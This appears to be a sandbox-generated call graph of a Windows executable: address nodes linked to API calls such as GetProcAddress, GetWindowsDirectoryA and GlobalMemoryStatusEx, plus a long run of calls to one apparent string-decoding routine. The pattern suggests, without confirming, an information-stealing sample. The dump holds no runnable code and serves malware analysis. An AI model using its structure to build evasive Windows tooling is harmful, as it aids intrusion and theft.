417500 GetWindowsDirectoryA 26403->27332 26406 41a7a0 lstrcpy 26407 415db8 26406->26407 27342 404880 26407->27342 26409 415dbe 27488 4117a0 26409->27488 26411 415dc6 26412 41a740 lstrcpy 26411->26412 26413 415de9 26412->26413 26414 401590 lstrcpy 26413->26414 26415 415dfd 26414->26415 27508 405960 39 API calls codecvt 26415->27508 26417 415e03 27509 411050 strtok_s strtok_s lstrlenA lstrcpy 26417->27509 26419 415e0e 26420 41a740 lstrcpy 26419->26420 26421 415e32 26420->26421 26422 401590 lstrcpy 26421->26422 26423 415e46 26422->26423 27510 405960 39 API calls codecvt 26423->27510 26425 415e4c 27511 410d90 7 API calls 26425->27511 26427 415e57 26428 41a740 lstrcpy 26427->26428 26429 415e79 26428->26429 26430 401590 lstrcpy 26429->26430 26431 415e8d 26430->26431 27512 405960 39 API calls codecvt 26431->27512 26433 415e93 27513 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26433->27513 26435 415e9e 26436 401590 lstrcpy 26435->26436 26437 415eb5 26436->26437 27514 411a10 121 API calls 26437->27514 26439 415eba 26440 41a740 lstrcpy 26439->26440 26441 415ed6 26440->26441 27515 404fb0 8 API calls 26441->27515 26443 415edb 26444 401590 lstrcpy 26443->26444 26445 415f5b 26444->26445 27516 410740 292 API calls 26445->27516 26447 415f60 26448 41a740 lstrcpy 26447->26448 26449 415f86 26448->26449 26450 401590 lstrcpy 26449->26450 26451 415f9a 26450->26451 27517 405960 39 API calls codecvt 26451->27517 26453 415fa0 27518 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26453->27518 26455 415fab 26456 401590 lstrcpy 26455->26456 26457 415feb 26456->26457 27519 401e80 67 API calls 26457->27519 26459 415ff0 26460 416000 26459->26460 26461 416092 26459->26461 26463 41a740 lstrcpy 26460->26463 26462 41a7a0 lstrcpy 26461->26462 26464 4160a5 26462->26464 26465 416020 26463->26465 26467 401590 lstrcpy 26464->26467 26466 401590 lstrcpy 26465->26466 26468 416034 26466->26468 26469 4160b9 26467->26469 27520 405960 39 API calls codecvt 26468->27520 27523 405960 39 API calls codecvt 26469->27523 26472 4160bf 27524 413560 36 API calls 26472->27524 26473 41603a 27521 4112d0 21 API calls codecvt 26473->27521 26476 41608a 26479 41610b 26476->26479 26481 401590 lstrcpy 26476->26481 26477 416045 26478 401590 lstrcpy 26477->26478 26480 416085 26478->26480 26483 416130 26479->26483 26486 401590 lstrcpy 26479->26486 27522 413dc0 75 API calls 26480->27522 26485 4160e7 26481->26485 26484 416155 26483->26484 26488 401590 lstrcpy 26483->26488 26490 41617a 26484->26490 26495 401590 lstrcpy 26484->26495 27525 4140b0 64 API calls codecvt 26485->27525 26487 41612b 26486->26487 27527 414780 116 API calls codecvt 26487->27527 26493 416150 26488->26493 26491 41619f 26490->26491 26496 401590 lstrcpy 26490->26496 26497 4161c4 26491->26497 26502 401590 lstrcpy 26491->26502 27528 414bb0 67 API calls codecvt 26493->27528 26494 4160ec 26499 401590 lstrcpy 26494->26499 26500 416175 26495->26500 26501 41619a 26496->26501 26504 4161e9 26497->26504 26510 401590 lstrcpy 26497->26510 26503 416106 26499->26503 27529 414d70 75 API calls 26500->27529 27530 414f40 69 API calls codecvt 26501->27530 26508 4161bf 26502->26508 27526 415100 71 API calls 26503->27526 26506 416210 26504->26506 26511 401590 lstrcpy 26504->26511 26512 416220 26506->26512 26513 4162b3 26506->26513 27531 407710 125 API calls codecvt 26508->27531 26515 4161e4 26510->26515 26516 416209 26511->26516 26518 41a740 lstrcpy 26512->26518 26517 41a7a0 lstrcpy 26513->26517 27532 415050 67 API calls codecvt 26515->27532 27533 419010 54 API calls codecvt 26516->27533 26521 4162c6 26517->26521 26522 416241 26518->26522 26523 401590 lstrcpy 26521->26523 26524 401590 lstrcpy 26522->26524 26525 4162da 26523->26525 26526 416255 26524->26526 27537 405960 39 API calls codecvt 26525->27537 27534 405960 39 API calls codecvt 26526->27534 26529 4162e0 27538 413560 36 API calls 26529->27538 26530 41625b 27535 4112d0 21 API calls codecvt 26530->27535 26533 416266 26535 401590 lstrcpy 26533->26535 26534 4162ab 26537 41a7a0 lstrcpy 26534->26537 26536 4162a6 26535->26536 27536 413dc0 75 API calls 26536->27536 26538 4162fc 26537->26538 26540 401590 lstrcpy 26538->26540 26541 416310 26540->26541 27539 405960 39 API calls codecvt 26541->27539 26543 41631c 26545 416338 26543->26545 27540 416630 9 API calls codecvt 26543->27540 26545->26200 26549 404697 26546->26549 26547 4046ac 11 API calls 26547->26549 26548 40474f 6 API calls 26548->26206 26549->26547 26549->26548 26550->26293 26553 4010c2 codecvt 26551->26553 26552 4010fd 26552->26323 26553->26552 26554 4010e2 VirtualFree 26553->26554 26554->26552 26556 401233 GlobalMemoryStatusEx 26555->26556 26556->26328 26557->26339 26559 41a7c2 26558->26559 26560 41a7ec 26559->26560 26561 41a7da lstrcpy 26559->26561 26560->26344 26561->26560 26563 41a740 lstrcpy 26562->26563 26564 416833 26563->26564 26565 41a9b0 4 API calls 26564->26565 26566 416845 26565->26566 26567 41a8a0 lstrcpy 26566->26567 26568 41684e 26567->26568 26569 41a9b0 4 API calls 26568->26569 26570 416867 26569->26570 26571 41a8a0 lstrcpy 26570->26571 26572 416870 26571->26572 26573 41a9b0 4 API calls 26572->26573 26574 41688a 26573->26574 26575 41a8a0 lstrcpy 26574->26575 26576 416893 26575->26576 26577 41a9b0 4 API calls 26576->26577 26578 4168ac 26577->26578 26579 41a8a0 lstrcpy 26578->26579 26580 4168b5 26579->26580 26581 41a9b0 4 API calls 26580->26581 26582 4168cf 26581->26582 26583 41a8a0 lstrcpy 26582->26583 26584 4168d8 26583->26584 26585 41a9b0 4 API calls 26584->26585 26586 4168f3 26585->26586 26587 41a8a0 lstrcpy 26586->26587 26588 4168fc 26587->26588 26589 41a7a0 lstrcpy 26588->26589 26590 416910 26589->26590 26590->26351 26592 41a812 26591->26592 26592->26354 26594 41a83f 26593->26594 26595 415b54 26594->26595 26596 41a87b lstrcpy 26594->26596 26595->26364 26596->26595 26598 41a8a0 lstrcpy 26597->26598 26599 416443 26598->26599 26600 41a8a0 lstrcpy 26599->26600 26601 416455 26600->26601 26602 41a8a0 lstrcpy 26601->26602 26603 416467 26602->26603 26604 41a8a0 lstrcpy 26603->26604 26605 415b86 26604->26605 26605->26370 26607 4045c0 34 API calls 26606->26607 26608 4026b4 26607->26608 26609 4045c0 34 API calls 26608->26609 26610 4026d7 26609->26610 26611 4045c0 34 API calls 26610->26611 26612 4026f0 26611->26612 26613 4045c0 34 API calls 26612->26613 26614 402709 26613->26614 26615 4045c0 34 API calls 26614->26615 26616 402736 26615->26616 26617 4045c0 34 API calls 26616->26617 26618 40274f 26617->26618 26619 4045c0 34 API calls 26618->26619 26620 402768 26619->26620 26621 4045c0 34 API calls 26620->26621 26622 402795 26621->26622 26623 4045c0 34 API calls 26622->26623 26624 4027ae 26623->26624 26625 4045c0 34 API calls 26624->26625 26626 4027c7 26625->26626 26627 4045c0 34 API calls 26626->26627 26628 4027e0 26627->26628 26629 4045c0 34 API calls 26628->26629 26630 4027f9 26629->26630 26631 4045c0 34 API calls 26630->26631 26632 402812 26631->26632 26633 4045c0 34 API calls 26632->26633 26634 40282b 26633->26634 26635 4045c0 34 API calls 26634->26635 26636 402844 26635->26636 26637 4045c0 34 API calls 26636->26637 26638 40285d 26637->26638 26639 4045c0 34 API calls 26638->26639 26640 402876 26639->26640 26641 4045c0 34 API calls 26640->26641 26642 40288f 26641->26642 26643 4045c0 34 API calls 26642->26643 26644 4028a8 26643->26644 26645 4045c0 34 API calls 26644->26645 26646 4028c1 26645->26646 26647 4045c0 34 API calls 26646->26647 26648 4028da 26647->26648 26649 4045c0 34 API calls 26648->26649 26650 4028f3 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 40290c 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 402925 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 40293e 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 402957 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 402970 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 402989 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 4029a2 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 4029bb 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 4029d4 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 4029ed 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 402a06 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 402a1f 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 402a38 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 402a51 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 402a6a 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 402a83 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 402a9c 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 402ab5 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 402ace 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402ae7 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 402b00 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 402b19 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 402b32 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 402b4b 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 402b64 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 402b7d 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402b96 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 402baf 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402bc8 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402be1 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 402bfa 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 402c13 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 402c2c 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 402c45 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 402c5e 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402c77 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402c90 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402ca9 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402cc2 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402cdb 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402cf4 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402d0d 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402d26 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402d3f 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402d58 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402d71 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402d8a 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402da3 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402dbc 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402dd5 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402dee 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402e07 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402e20 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402e39 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402e52 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402e6b 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402e84 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402e9d 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402eb6 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402ecf 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 402ee8 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402f01 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402f1a 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402f33 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402f4c 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402f65 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402f7e 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402f97 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402fb0 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402fc9 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402fe2 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402ffb 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 403014 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 40302d 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 403046 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 40305f 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 403078 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 403091 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 4030aa 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 4030c3 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 4030dc 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 4030f5 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 40310e 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 403127 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 403140 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 403159 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 403172 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 40318b 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 4031a4 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 4031bd 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 4031d6 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 4031ef 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 403208 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 403221 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 40323a 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 403253 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 40326c 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 403285 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 40329e 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 4032b7 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 4032d0 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 4032e9 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 403302 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 40331b 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 403334 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 40334d 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403366 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 40337f 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403398 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 4033b1 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 4033ca 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 4033e3 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 4033fc 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 403415 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 40342e 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 403447 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403460 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403479 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403492 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 4034ab 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 4034c4 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 4034dd 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 4034f6 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 40350f 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 403528 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403541 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 40355a 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403573 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 40358c 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 4035a5 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 4035be 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 4035d7 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 4035f0 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 403609 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 403622 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 40363b 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403654 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 40366d 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403686 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 40369f 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 4036b8 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 4036d1 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 4036ea 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 403703 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 40371c 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 403735 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 40374e 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403767 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403780 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403799 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 4037b2 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 4037cb 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 4037e4 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 4037fd 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 403816 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 40382f 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 403848 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403861 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 40387a 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403893 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 4038ac 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 4038c5 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 4038de 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 4038f7 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 403910 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 403929 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 403942 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 40395b 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403974 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 40398d 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 4039a6 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 4039bf 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 4039d8 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 4039f1 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 403a0a 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 403a23 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 403a3c 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403a55 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 403a6e 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 403a87 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 403aa0 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 403ab9 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 403ad2 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403aeb 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 403b04 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 403b1d 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 403b36 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 403b4f 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403b68 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403b81 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403b9a 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403bb3 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403bcc 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403be5 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 403bfe 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 403c17 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403c30 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 403c49 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403c62 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403c7b 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403c94 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403cad 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403cc6 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403cdf 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403cf8 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403d11 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403d2a 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403d43 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403d5c 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403d75 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403d8e 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403da7 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403dc0 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403dd9 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403df2 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403e0b 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403e24 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403e3d 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403e56 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403e6f 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403e88 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403ea1 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403eba 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403ed3 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403eec 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403f05 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403f1e 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403f37 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403f50 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403f69 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403f82 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403f9b 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403fb4 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403fcd 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403fe6 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403fff 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 404018 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 404031 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 40404a 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 404063 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 40407c 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 404095 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 4040ae 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 4040c7 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 4040e0 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 4040f9 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 404112 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 40412b 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 404144 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 40415d 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404176 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 40418f 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 4041a8 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 4041c1 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4041da 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4041f3 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 40420c 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 404225 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 40423e 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404257 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404270 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 404289 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 4042a2 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 4042bb 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 4042d4 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4042ed 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 404306 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 40431f 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 404338 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404351 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40436a 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404383 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40439c 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 4043b5 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 4043ce 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4043e7 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 404400 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 404419 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 404432 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 40444b 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404464 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40447d 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 404496 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 4044af 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 4044c8 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 4044e1 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4044fa 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 404513 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 40452c 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 404545 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 40455e 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404577 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404590 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 4045a9 27237->27238 27239 419c10 27238->27239 27240 419c20 43 API calls 27239->27240 27241 41a036 8 API calls 27239->27241 27240->27241 27242 41a146 27241->27242 27243 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27241->27243 27244 41a153 8 API calls 27242->27244 27245 41a216 27242->27245 27243->27242 27244->27245 27246 41a298 27245->27246 27247 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27245->27247 27248 41a2a5 6 API calls 27246->27248 27249 41a337 27246->27249 27247->27246 27248->27249 27250 41a344 9 API calls 27249->27250 27251 41a41f 27249->27251 27250->27251 27252 41a4a2 27251->27252 27253 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27251->27253 27254 41a4ab GetProcAddress GetProcAddress 27252->27254 27255 41a4dc 27252->27255 27253->27252 27254->27255 27256 41a515 27255->27256 27257 41a4e5 GetProcAddress GetProcAddress 27255->27257 27258 41a612 27256->27258 27259 41a522 10 API calls 27256->27259 27257->27256 27260 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27258->27260 27261 41a67d 27258->27261 27259->27258 27260->27261 27262 41a686 GetProcAddress 27261->27262 27263 41a69e 27261->27263 27262->27263 27264 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27263->27264 27265 415ca3 27263->27265 27264->27265 27266 401590 27265->27266 27541 401670 27266->27541 27269 41a7a0 lstrcpy 27270 4015b5 27269->27270 27271 41a7a0 lstrcpy 27270->27271 27272 4015c7 27271->27272 27273 41a7a0 lstrcpy 27272->27273 27274 4015d9 27273->27274 27275 41a7a0 lstrcpy 27274->27275 27276 401663 27275->27276 27277 415510 27276->27277 27278 415521 27277->27278 27279 41a820 2 API calls 27278->27279 27280 41552e 27279->27280 27281 41a820 2 API calls 27280->27281 27282 41553b 27281->27282 27283 41a820 2 API calls 27282->27283 27284 415548 27283->27284 27285 41a740 lstrcpy 27284->27285 27286 415555 27285->27286 27287 41a740 lstrcpy 27286->27287 27288 415562 27287->27288 27289 41a740 lstrcpy 27288->27289 27290 41556f 27289->27290 27291 41a740 lstrcpy 27290->27291 27330 41557c 27291->27330 27292 415643 StrCmpCA 27292->27330 27293 4156a0 StrCmpCA 27294 4157dc 27293->27294 27293->27330 27295 41a8a0 lstrcpy 27294->27295 27297 4157e8 27295->27297 27296 401590 lstrcpy 27296->27330 27299 41a820 2 API calls 27297->27299 27298 41a820 lstrlenA lstrcpy 27298->27330 27300 4157f6 27299->27300 27304 41a820 2 API calls 27300->27304 27301 415856 StrCmpCA 27302 415991 27301->27302 27301->27330 